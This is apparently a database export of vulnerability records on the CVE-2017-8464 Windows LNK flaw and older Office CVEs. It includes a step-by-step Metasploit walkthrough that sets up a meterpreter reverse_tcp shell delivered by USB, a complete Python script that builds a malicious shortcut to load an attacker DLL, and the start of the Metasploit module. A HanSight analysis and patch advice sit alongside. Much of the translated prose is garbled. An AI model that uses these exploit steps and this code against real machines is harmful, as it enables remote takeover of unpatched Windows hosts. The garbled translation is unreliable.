"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570", "CVE-2017-0199"], "modified": "2017-08-08T00:00:00", "id": "MYHACK58:62201788439", "href": "http://www.myhack58.com/Article/html/3/62/2017/88439.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-06T22:18:09", "description": "As early as 6 May 13, Microsoft released patches to fix numbered CVE-2017-8464 vulnerability, a local user or a remote attacker can exploit this vulnerability to generate a specially crafted shortcut, and through a removable device or a remote shared way lead to remote code execution, Dating back to the past, the NSA recognized the use of similar vulnerabilities and to\u201cOlympic Game\u201dfor the code developed Stuxnet virus, to prevent Iran from developing nuclear weapons. \nCVE-2017-8464 vulnerability affects versions: \nWindows 7 \nWindows 8.1 \nWindows RT 8.1 \nWindows 10 \nWindows Server 2008 \nWindows Server 2008 R2 \nWindows Server 2012 \nWindows Server 2012 R2 \nWindows Server 2016 \nUse \n1 in Metasploit-Framework in the use of CVE-2017-8464 \n1. First download the latest zip package\u3010download\u3011, download after the completion of the compressed package inside the modules/exploits/windows/fileformat in cve_2017_8464_lnk_rce. rb is copied to the directory/usr/share/metasploit-framework/modules/exploits/windows/fileformat. \n2. Just copy the rb file will be an error, must then be compressed within the package data/exploits in the cve-2017-8464 folder copy to/usr/share/metasploit-framework/data/exploits. \n3. Open a terminal \nmsfconsole \nuse exploit/windows/fileformat/cve_2017_8464_lnk_rce \nset PAYLOAD windows/meterpreter/reverse_tcp \nset LHOST [your IP address] \nTrojan \n! [](/Article/UploadPic/2017-8/20178711814896. png? www. myhack58. com) \n! [](/Article/UploadPic/2017-8/20178711814375. png? www. myhack58. com) \nAfter/root/. msf4/local, it will generate our desired files, generate so much and the letter is concerned, are left with no space. \n4. Continue to enter the command \nuse multi/handler \nset paylaod windows/meterpreter/reverse_tcp \nset LHOST [your IP address] \nrun \n5. The removable disk inserted into the drone, if the drone on auto play, select the Browse for a file when you can rebound. \n! [](/Article/UploadPic/2017-8/20178711814631. png? www. myhack58. com) \nDemo: \n! [](/Article/UploadPic/2017-8/20178711814509. gif? www. myhack58. com) \n*2\uff09PowerShell \nThis using the Powershell method is not the previous network spread of the CVE-2017-8464 reproduction method. \nFirst of all download the Export-LNKPwn. ps1\u3010Click here\u3011 \nNote: \n-Need 4. 0 or above. NET Library version, the authors use a number only PowerShell 5.0 is only some of the constructors like new (), the \u4ed6\u6253\u7b97\u5c06\u7248\u672c\u8981\u6c42\u964d\u4f4e\u5230.NET 3.5 and PowerShell 2.0, so it module in all the target environments can be loaded into memory. \n-The authors want to expand the function, so the user can generate the original Stuxnet LNK exp\uff08CVE-2010-2568, and solve the bypass issue CVE-2015-0096 in it. \n-Antivirus will handle your LNK, and more than ready to escape detection! \nParameter Description: \nLNKOutPath: local save the LNK file's full path. \nTargetCPLPath: local/remote target cpl of the full path. \nType: used FolderDataBlock type,\u201cSpecialFolderDataBlock\u201dand\u201cKnownFolderDataBlock\u201dtwo. \nExample of use: \nC:\\PS&gt; The Export-LNKPwn-LNKOutPath C:\\Some\\Local\\Path.lnk -TargetCPLPath C:\\Target\\CPL\\Path.cpl -Type SpecialFolderDataBlock \nC:\\PS&gt; The Export-LNKPwn-LNKOutPath C:\\Some\\Local\\Path.lnk -TargetCPLPath C:\\Target\\CPL\\Path.cpl -Type KnownFolderDataBlock \n\n", "cvss3": {}, "published": "2017-08-07T00:00:00", "type": "myhack58", "title": "\u201cThe seismic network of the third generation\u201d\uff08CVE-2017-8464 several species using the method and prevention-vulnerability and early warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464", "CVE-2010-2568", "CVE-2015-0096"], "modified": "2017-08-07T00:00:00", "id": "MYHACK58:62201788412", "href": "http://www.myhack58.com/Article/html/3/62/2017/88412.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-09T15:19:46", "description": "Microsoft in the 2017 year 6 month patch patch a shortcut CVE-2107-8464 of vulnerability, the announcement says this vulnerability is the National background of network attacks the use to implement the attack, the vulnerability is also known as the seismic network of the third generation, recently Metasploit published on the vulnerability of the PoC. [ This article is HanSight Han si original manuscript, for reprint please indicate the source\uff01] \nMicrosoft in the 2017 year 6 month patch patch a shortcut CVE-2107-8464 of vulnerability, the announcement says this vulnerability is the National background of network attacks the use to implement the attack, the vulnerability is also known as\u201cearthquake network generation\u201d, recently Metasploit published on the vulnerability of the PoC. \nThe vulnerability principle is the same as 2010, the United States and Israel to invade and destroy Iran's nuclear facilities seismic network operations the use of penetrating nuclear isolation network Vulnerability, CVE-2010-2568 is very similar,\"it can easily be exploited by hackers to attack the infrastructure, storage of key information on core isolation system.\" \n\"When there is a vulnerability in the computer is plug in to save a vulnerable file of U disc, no need extra operation, exploits the program can perform and complete control of the user computer system\" is. \nVulnerability PoC demo: \n! [](/Article/UploadPic/2017-8/201789195027567. gif? www. myhack58. com) \nThe PoC for the LNK File format as shown below: \n! [](/Article/UploadPic/2017-8/201789195027829. png? www. myhack58. com) \nLNK File format the following figure \nTypically contains a Link to the file header, LinkTargetIDList, the error pop-UPS, And StringData and the extradata property of. \n! [](/Article/UploadPic/2017-8/201789195027941. jpg? www. myhack58. com) \nThe PoC relates to the important field, after the text will be explained. \nWant to trigger this vulnerability, LNK files must have the LinkTargetIDList and the extradata property of the two Block. PoC File format figure in the second row of numbers 81, The representative is the LNK file header of the LinkFlags field, 81 is the meaning of the LNK file contains a LinkTargetIDList, and string using Unicode encoding. In LinkTargetIDList followed by is the extradata property, the present vulnerability is SpecialFolderDataBlock it. \nLinkTargetIDList format the following figure \nThe PoC contains 3 item, wherein the item 2 containing the trigger the vulnerability after the automatic execution of the malicious DLL file path: \n! [](/Article/UploadPic/2017-8/201789195027452. jpg? www. myhack58. com) \nPoC IDListSize is 0x8E, which has 3 item, the first item The size is 0\u00d714, and the second item The size is 0\u00d714, and the third item The size is 0\u00d764 in. \nLinkTargetIDList included in the Item format is as follows: \n! [](/Article/UploadPic/2017-8/201789195027566. jpg? www. myhack58. com) \nThe extradata property format the following figure \nThe vulnerability used is SpecialFolderDataBlock: the \n! [](/Article/UploadPic/2017-8/201789195027884. jpg? www. myhack58. com) \nTo understand the Complete file formats, vulnerability principle not very complicated: finished parsing LinkTargetIDList after parsing SpecialFolderDataBlock, parsing SpecialFolderDataBlock process CShellLink::_DecodeSpecialFolder will according to which the offset 0\u00d728 to find the front of the item 2, and will be one of the DLLload into memory to perform one of the DllMain. Due to this parsing process is in the explorer. exe in the implementation, so the corresponding load into memory a malicious DLL also has the same high permissions is generally High in. \nThe figure below is the PoC exploit is triggered when the call stack, as well as vulnerability after the implementation will load the malicious DLL into memory: \n! [](/Article/UploadPic/2017-8/201789195027956. jpg? www. myhack58. com) \n! [](/Article/UploadPic/2017-8/201789195027572. jpg? www. myhack58. com) \nPatch comparison: \n! [](/Article/UploadPic/2017-8/201789195027161. jpg? www. myhack58. com) \nMicrosoft in patch, by calling _IsRegisteredCPLApplet function of the DLL path validation failed will no longer call CPL_LoadCPLModule function. \nHanSight solutions \nHanSight Enterprise through the host log correlation analysis, summarizes the Stuxnet vulnerability in common, including the U disk plug acts and the host process behavior, etc., can detect such problems, and an alarm is generated: the \n! [](/Article/UploadPic/2017-8/201789195027690. png? www. myhack58. com) \nPrevention policy recommendations \n1\\. Use HanSight Enterprise monitoring host behavior in a timely manner to warn the Troubleshooting process. \n2\\. Update Windows operating system patches \nhttps://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2017-8464 \nReferences \n1\\. Metasploit \n2\\. Shell Link (. LNK) File format: \nhttps://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SHLLINK/[MS-SHLLINK]. pdf \n\n", "cvss3": {}, "published": "2017-08-09T00:00:00", "type": "myhack58", "title": "\u201cThe seismic network of the third generation\u201dCVE-2017-8464 vulnerability analysis and early warning-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464", "CVE-2107-8464", "CVE-2010-2568"], "modified": "2017-08-09T00:00:00", "id": "MYHACK58:62201788476", "href": "http://www.myhack58.com/Article/html/3/62/2017/88476.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-13T15:28:22", "description": "This article is for me at Bluehat Shanghai 2019 presentation of an extended summary. In this article, I will summarize the 2010 to 2018 years of Office-related 0day/1day vulnerability. I will be for each type of vulnerability do once carded, and for each vulnerability related to the analysis of the articles referenced and categorized. \nHope this article can help to follow-up engaged in office vulnerability research. \n\nOverview \nFrom 2010 to 2018, the office of the 0day/1day attack has never been suspended before. Some of the following CVE number, is my in the course of the study specifically observed, there have been actual attacks sample 0day/1day vulnerability(perhaps there are some omissions, the reader can Supplement the). \nWe first look at the specific CVE number. \nYear \nNumber \n2010 \nCVE-2010-3333 \n2011 \nCVE-2011-0609/CVE-2011-0611 \n2012 \nCVE-2012-0158/CVE-2012-0779/CVE-2012-1535/CVE-2012-1856 \n2013 \nCVE-2013-0634/CVE-2013-3906 \n2014 \nCVE-2014-1761/CVE-2014-4114/CVE-2014-6352 \n2015 \nCVE-2015-0097/CVE-2015-1641/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645 \n2016 \nCVE-2016-4117/CVE-2016-7193/CVE-2016-7855 \n2017 \nCVE-2017-0199/CVE-2017-0261/CVE-2017-0262/CVE-2017-8570/CVE-2017-8759/CVE-2017-11826/CVE-2017-11882/CVE-2017-11292 \n2018 \nCVE-2018-0798/CVE-2018-0802/CVE-2018-4878/CVE-2018-5002/CVE-2018-8174/CVE-2018-8373/CVE-2018-15982 \nOur first press Assembly of the type above-described vulnerability classification. Note that, the Flash itself also belongs to the ActiveX control-a, the following table of classification I be independently classified as a class. \nComponent type \nNumber \nRTF control word parsing problem \nCVE-2010-3333/CVE-2014-1761/CVE-2016-7193 \nThe Open XML tag parsing problem \nCVE-2015-1641/CVE-2017-11826 \nActiveX control to resolve the problem \nCVE-2012-0158/CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nOffice embedded Flash vulnerabilities \nCVE-2011-0609/CVE-2011-0611/CVE-2012-0779/CVE-2012-1535/CVE-2013-0634/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645/CVE-2016-4117/CVE-2016-7855/CVE-2017-11292/CVE-2018-4878/CVE-2018-5002/CVE-2018-15982 \nOffice TIFF image parsing vulnerability \nCVE-2013-3906 \nOffice EPS file parsing vulnerability \nCVE-2015-2545/CVE-2017-0261/CVE-2017-0262 \nBy means of the Moniker the loading vulnerability \nCVE-2017-0199/CVE-2017-8570/CVE-2017-8759/CVE-2018-8174/CVE-2018-8373 \nOther Office logic vulnerability \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097 \nWe then based on the vulnerability type of the above-mentioned non-Flash vulnerabilities classification. Flash vulnerabilities related to the summary you can refer to other researcher's articles \nVulnerability type \nNumber \nStack Overflow(Stack Overflow) \nCVE-2010-3333/CVE-2012-0158/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nStack bounds write(Out-of-bound Write) \nCVE-2014-1761/CVE-2016-7193 \nType confusion(Type Confusion) \nCVE-2015-1641/CVE-2017-11826/CVE-2017-0262 \nAfter the release of reuse(Use After Free) \nCVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2017-0261/CVE-2018-8174/CVE-2018-8373 \nInteger overflow(Integer Overflow) \nCVE-2013-3906 \nLogic vulnerabilities(Logical vulnerability) \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097/CVE-2017-0199/CVE-2017-8570/CVE-2017-8759 \nNext We according to the above second table Flash vulnerability, except to one by one look at these vulnerabilities. \n\nRTF control word parsing problem \nCVE-2010-3333 \nThe vulnerability is the Cohen laboratory head of the wushi found. This is a stack overflow vulnerability. \nOn the vulnerability analysis of the article to see snow on a lot, the following are a few articles. \nCVE-2010-3333 vulnerability analysis(in depth analysis) \nMS10-087 from vulnerability to patch to the POC \nThe vulnerability of the war of Chapter 2, Section 4 of this vulnerability also have to compare the system description, the interested reader can read The Associated chapters. \nCVE-2014-1761 \nThe vulnerability is Google found a 0day in. This is a heap memory bounds write vulnerability. \nLi Hai fly was on the vulnerability done a very wonderful analysis. \nA Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers \nSee snow forum is also related to the vulnerability of the two high-quality analysis articles. \nCVE-2014-1761 analysis notes \nms14-017(cve-2014-1761)learn the notes inside there is mentioned how to configure the correct environment \nThe security agent is also related to the vulnerability of a high-quality analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08the third period\uff09 \nIn addition, South Korea's AhnLab also made a post about this vulnerability report. \nAnalysis of Zero-Day Exploit_Issue 01 Microsoft Word RTF Vulnerability CVE-2014-1761 \nDebugging this vulnerability requires attention is the vulnerability of some of the samples to trigger the environment is relatively harsh, the article inside mentions how to construct a relevant experimental environment. \nCVE-2016-7193 \nThe vulnerability is the Austrian Military Cyber Emergency Readiness Team Austria military Cyber Emergency Readiness Team reported to Microsoft a 0day is. \nIt is also a heap memory bounds write vulnerability. \nBaidu Security Labs has worked on the vulnerability done a more complete analysis. \nAPT attack weapon-the Word vulnerability, CVE-2016-7193 principles of the secret \nI also worked on the vulnerability of the use of writing to share through an article analysis. \nCombined with a field sample to construct a cve-2016-7193 bomb calculator use \n\nThe Open XML tag parsing problem \nCVE-2015-1641 \nGoogle 0day summary table will be listed for 2015 0day one. \nThis is a type confusion vulnerability. \nAbout the vulnerability, the fly tower has written an article analysis article. \nThe Curious Case Of The Document Exploiting An Unknown Vulnerability \u2013 Part 1 \nAli safe is also about the vulnerability wrote a wonderful analysis. \nword type confusion vulnerability CVE-2015-1641 analysis \nThe security agent also has the vulnerability of a wonderful analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08fourth period\uff09 \nKnow Chong Yu the 404 lab also wrote an article on the vulnerability the wonderful analysis. \nCVE-2015-1641 Word using the sample analysis \nI've also written relates to the vulnerability of the principles of an article to share. \nThe Open XML tag parsing class vulnerability analysis ideas \nIn debugging this relates to the heap spray in the office sample, the need to pay special attention to the debugger intervention tends to affect the process heap layout, particularly some of the heap option settings. If when debugging the sample behavior can not be a normal trigger, often directly with the debugger launch the sample result, this time you can try double-click the sample after Hang, the debug controller. \n\n\n**[1] [[2]](<94516_2.htm>) [[3]](<94516_3.htm>) [[4]](<94516_4.htm>) [next](<94516_2.htm>)**\n", "cvss3": {}, "published": "2019-06-13T00:00:00", "type": "myhack58", "title": "The macro perspective of the office vulnerability, 2010-2018-a vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2545", "CVE-2012-1856", "CVE-2012-1535", "CVE-2017-11292", "CVE-2018-8174", "CVE-2018-4878", "CVE-2011-0609", "CVE-2017-11882", "CVE-2018-0802", "CVE-2016-7855", "CVE-2017-8570", "CVE-2016-4117", "CVE-2012-0158", "CVE-2015-1642", "CVE-2010-3333", "CVE-2013-0634", "CVE-2015-5119", "CVE-2013-3906", "CVE-2014-4114", "CVE-2016-7193", "CVE-2018-15982", "CVE-2015-2424", "CVE-2018-8373", "CVE-2011-0611", "CVE-2015-5122", "CVE-2017-0199", "CVE-2015-0097", "CVE-2018-5002", "CVE-2018-0798", "CVE-2014-1761", "CVE-2014-6352", "CVE-2017-8759", "CVE-2015-1641", "CVE-2015-7645", "CVE-2017-11826", "CVE-2017-0262", "CVE-2012-0779", "CVE-2017-0261"], "modified": "2019-06-13T00:00:00", "id": "MYHACK58:62201994516", "href": "http://www.myhack58.com/Article/html/3/62/2019/94516.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Windows - .LNK Shortcut File Code Execution", "cvss3": {}, "published": "2017-08-06T00:00:00", "type": "exploitpack", "title": "Microsoft Windows - .LNK Shortcut File Code Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464", "CVE-2015-0096"], "modified": "2017-08-06T00:00:00", "id": "EXPLOITPACK:20DF492E20233C084EF3A6265A4CB16A", "href": "", "sourceData": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Title : CVE-2017-8464 | LNK Remote Code Execution Vulnerability\n# CVE : 2017-8464\n# Authors : [ykoster, nixawk]\n# Notice : Only for educational purposes.\n# Support : python2\n\nimport struct\n\n\ndef generate_SHELL_LINK_HEADER():\n # _________________________________________________________________\n # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\n # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|\n # -----------------------------------------------------------------\n # | HeaderSize |\n # -----------------------------------------------------------------\n # | LinkCLSID (16 bytes) |\n # -----------------------------------------------------------------\n # | ... |\n # -----------------------------------------------------------------\n # | ... |\n # -----------------------------------------------------------------\n # | LinkFlags |\n # -----------------------------------------------------------------\n # | FileAttributes |\n # -----------------------------------------------------------------\n # | CreationTime |\n # -----------------------------------------------------------------\n # | ... |\n # -----------------------------------------------------------------\n # | AccessTime |\n # -----------------------------------------------------------------\n # | ... |\n # -----------------------------------------------------------------\n # | WriteTime |\n # -----------------------------------------------------------------\n # | ... |\n # -----------------------------------------------------------------\n # | FileSize |\n # -----------------------------------------------------------------\n # | IconIndex |\n # -----------------------------------------------------------------\n # | ShowCommand |\n # -----------------------------------------------------------------\n # | HotKey | Reserved1 |\n # -----------------------------------------------------------------\n # | Reserved2 |\n # -----------------------------------------------------------------\n # | Reserved3 |\n # -----------------------------------------------------------------\n\n shell_link_header = [\n b'\\x4c\\x00\\x00\\x00', # \"HeaderSize\" : (4 bytes)\n b'\\x01\\x14\\x02\\x00\\x00\\x00\\x00\\x00\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x46', # \"LinkCLSID\" : (16 bytes) HKEY_CLASSES_ROOT\\CLSID\\{00021401-0000-0000-C000-000000000046}\n b'\\x81\\x00\\x00\\x00', # \"LinkFlags\" : (4 bytes) 0x81 = 0b10000001 = HasLinkTargetIDList + IsUnicode\n b'\\x00\\x00\\x00\\x00', # \"FileAttributes\" : (4 bytes)\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00', # \"CreationTime\" : (8 bytes)\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00', # \"AccessTime\" : (8 bytes)\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00', # \"WriteTime\" : (8 bytes)\n b'\\x00\\x00\\x00\\x00', # \"FileSize\" : (4 bytes)\n b'\\x00\\x00\\x00\\x00', # \"IconIndex\" : (4 bytes)\n b'\\x00\\x00\\x00\\x00', # \"ShowCommand\" : (4 bytes)\n b'\\x00\\x00', # \"HotKey\" : (2 bytes)\n b'\\x00\\x00', # \"Reserved1\" : (2 bytes)\n b'\\x00\\x00\\x00\\x00', # \"Reserved2\" : (4 bytes)\n b'\\x00\\x00\\x00\\x00', # \"Reserved3\" : (4 bytes)\n ]\n\n return b\"\".join(shell_link_header)\n\n\ndef generate_LINKTARGET_IDLIST(path, name):\n # _________________________________________________________________\n # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\n # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|\n # -----------------------------------------------------------------\n # | IDListSize | IDList(variable) |\n # -----------------------------------------------------------------\n # | ... |\n # -----------------------------------------------------------------\n\n # IDList = ItemID + ItemID + ... + TerminalID\n # ItemID = ItemIDSize + Data\n\n def generate_ItemID(Data):\n itemid = [\n struct.pack('H', len(Data) + 2), # ItemIDSize + len(Data)\n Data\n ]\n # ItemIDSize = struct.pack('H', len(Data) + 2) # ItemIDSize + len(Data)\n\n # return ItemIDSize + Data\n\n return b\"\".join(itemid)\n\n def generate_cpl_applet(path, name=name):\n name += b'\\x00'\n path += b'\\x00'\n\n bindata = [\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x6a\\x00\\x00\\x00\\x00\\x00\\x00',\n struct.pack('H', len(path)),\n struct.pack('H', len(name)),\n path.encode('utf-16')[2:],\n name.encode('utf-16')[2:],\n b\"\\x00\\x00\" # comment\n ]\n\n return b\"\".join(bindata)\n\n idlist = [\n # ItemIDList\n\n generate_ItemID(b'\\x1f\\x50\\xe0\\x4f\\xd0\\x20\\xea\\x3a\\x69\\x10\\xa2\\xd8\\x08\\x00\\x2b\\x30\\x30\\x9d'),\n generate_ItemID(b'\\x2e\\x80\\x20\\x20\\xec\\x21\\xea\\x3a\\x69\\x10\\xa2\\xdd\\x08\\x00\\x2b\\x30\\x30\\x9d'),\n generate_ItemID(generate_cpl_applet(path)),\n\n b'\\x00\\x00', # TerminalID\n ]\n\n idlist = b\"\".join(idlist)\n idlistsize = struct.pack('H', len(idlist))\n\n linktarget_idlist = [\n idlistsize,\n idlist,\n ]\n\n return b\"\".join(linktarget_idlist)\n\n\ndef generate_EXTRA_DATA():\n # ExtraData refers to a set of structures that convey additional information about a link target. These\n # optional structures can be present in an extra data section that is appended to the basic Shell Link\n # Binary File Format.\n\n # EXTRA_DATA = *EXTRA_DATA_BLOCK TERMINAL_BLOCK\n\n # EXTRA_DATA_BLOCK = CONSOLE_PROPS / CONSOLE_FE_PROPS / DARWIN_PROPS /\n # ENVIRONMENT_PROPS / ICON_ENVIRONMENT_PROPS /\n # KNOWN_FOLDER_PROPS / PROPERTY_STORE_PROPS /\n # SHIM_PROPS / SPECIAL_FOLDER_PROPS /\n # TRACKER_PROPS / VISTA_AND_ABOVE_IDLIST_PROPS\n\n # SpecialFolderDataBlock\n\n # _________________________________________________________________\n # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\n # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|\n # -----------------------------------------------------------------\n # | BlockSize |\n # -----------------------------------------------------------------\n # | BlockSignatire |\n # -----------------------------------------------------------------\n # | SpecialFolderID |\n # -----------------------------------------------------------------\n # | Offset |\n # -----------------------------------------------------------------\n\n extra_data = [\n b'\\x10\\x00\\x00\\x00',\n b'\\x05\\x00\\x00\\xA0',\n b'\\x03\\x00\\x00\\x00',\n b'\\x28\\x00\\x00\\x00',\n b'\\x00\\x00\\x00\\x00' # TERMINAL_BLOCK\n ]\n\n return b\"\".join(extra_data)\n\n\ndef ms_shllink(path, name=b\"Microsoft\"):\n '''build Shell Link (.LNK) Binary File Format'''\n\n lnk_format = [\n\n # Structures\n\n # SHELL_LINK = SHELL_LINK_HEADER [LINKTARGET_IDLIST] [LINKINFO]\n # [STRING_DATA] *EXTRA_DATA\n\n\n # SHELL_LINK_HEADER:\n # A ShelllinkHeader structure which contains identification information, timestamps, and\n # flags that specify the presence of optional structures.\n\n generate_SHELL_LINK_HEADER(),\n\n # LINKTARGET_IDLIST:\n # An optional LinkTargetIDList structure, which specifies the target of the link. The\n # presence of this structure is specified by the HasLinkTargetIDList bit in the ShellLinkHeader.\n #\n #\n\n generate_LINKTARGET_IDLIST(path, name),\n\n # LINKINFO:\n # An optional LinkInfo structure, which specifies information necessary to resolve the link target.\n # The presence of this structure is specified by the HasLinkInfo bit in the ShellLinkHeader.\n\n # STRING_DATA:\n # Zero or more optional StringData structures, which are used to convey user interface and path\n # identification information. The presence of these structures is specified by bits in the ShellLinkHeader.\n\n # STRING_DATA = [NAME_STRING] [RELATIVE_PATH] [WORKING_DIR]\n # [COMMAND_LINE_ARGUMENTS] [ICON_LOCATION]\n\n # EXTRA_DATA:\n # Zero or more ExtraData structures\n\n generate_EXTRA_DATA()\n ]\n\n return b\"\".join(lnk_format)\n\n\nif __name__ == '__main__':\n import sys\n\n if len(sys.argv) != 3:\n print(\"[*] Name : CVE-2017-8464 | LNK Remote Code Execution Vulnerability\")\n print(\"[*] Usage: %s </path/to/test.lnk> </path/to/test.dll>\" % sys.argv[0])\n sys.exit(0)\n\n lnkpath = sys.argv[1]\n dllpath = sys.argv[2]\n\n bindata = ms_shllink(path=dllpath)\n\n with open(lnkpath, 'wb') as lnkf:\n lnkf.write(bindata)\n\n\n## References\n\n# 1. https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464\n# 2. https://msdn.microsoft.com/en-us/library/dd871305.aspx\n# 3. https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SHLLINK/[MS-SHLLINK]-160714.pdf\n# 4. https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf\n# 5. https://support.microsoft.com/en-us/help/149648/description-of-control-panel--cpl-files\n# 6. https://twitter.com/mkolsek/status/877499744704237568\n# 7. https://community.saas.hpe.com/t5/Security-Research/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/251257#.WXi4uNPys6g\n# 8. https://github.com/rapid7/metasploit-framework/pull/8767", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Windows - .LNK Shortcut File Code Execution (Metasploit)", "cvss3": {}, "published": "2017-07-26T00:00:00", "type": "exploitpack", "title": "Microsoft Windows - .LNK Shortcut File Code Execution (Metasploit)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464", "CVE-2015-0096"], "modified": "2017-07-26T00:00:00", "id": "EXPLOITPACK:773C207F8B68CF5AB40483F3A9751D81", "href": "", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n\n attr_accessor :exploit_dll_name\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'LNK Remote Code Execution Vulnerability',\n 'Description' => %q{\n This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\n that contain a dynamic icon, loaded from a malicious DLL.\n\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\n similar except in an additional SpecialFolderDataBlock is included. The folder ID set\n in this SpecialFolderDataBlock is 